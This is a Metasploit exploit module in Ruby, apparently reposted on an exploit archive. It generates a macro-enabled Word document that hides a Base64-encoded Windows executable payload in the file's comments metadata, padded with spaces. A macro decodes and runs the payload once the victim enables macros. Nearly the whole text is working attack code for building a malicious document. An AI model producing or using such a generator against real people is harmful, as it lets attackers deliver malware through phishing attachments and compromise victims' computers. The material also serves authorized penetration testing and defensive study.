Microsoft Office Word Malicious Macro Execution
Posted on 09 February 2017
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex/zip' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => "Microsoft Office Word Malicious Macro Execution", 'Description' => %q{ This module generates a macro-enabled Microsoft Office Word document. The comments metadata in the data is injected with a Base64 encoded payload, which will be decoded by the macro and execute as a Windows executable. For a successful attack, the victim is required to manually enable macro execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r' # Metasploit ], 'References' => [ ['URL', 'https://en.wikipedia.org/wiki/Macro_virus'] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'DisablePayloadHandler' => true }, 'Platform' => 'win', 'Targets' => [ ['Microsoft Office Word', {}], ], 'Privileged' => false, 'DisclosureDate' => "Jan 10 2012", 'DefaultTarget' => 0 )) register_options([ OptString.new("BODY", [false, 'The message for the document body', '']), OptString.new('FILENAME', [true, 'The Office document macro file', 'msf.docm']) ], self.class) end def on_file_read(short_fname, full_fname) buf = File.read(full_fname) case short_fname when /document.xml/ buf.gsub!(/DOCBODYGOESHER/, datastore['BODY']) when /core.xml/ b64_payload = ' ' * 55 b64_payload << Rex::Text.encode_base64(generate_payload_exe) buf.gsub!(/PAYLOADGOESHERE/, b64_payload) end # The original filename of __rels is actually ".rels". # But for some reason if that's our original filename, it won't be included # in the archive. So this hacks around that. case short_fname when /__rels/ short_fname.gsub!(/\_\_rels/, '.rels') end yield short_fname, buf end def package_docm(path) zip = Rex::Zip::Archive.new Dir["#{path}/**/**"].each do |file| p = file.sub(path+'/','') if File.directory?(file) print_status("Packaging directory: #{file}") zip.add_file(p) else on_file_read(p, file) do |fname, buf| print_status("Packaging file: #{fname}") zip.add_file(fname, buf) end end end zip.pack end def exploit print_status('Generating our docm file...') path = File.join(Msf::Config.install_root, 'data', 'exploits', 'office_word_macro') docm = package_docm(path) file_create(docm) super end end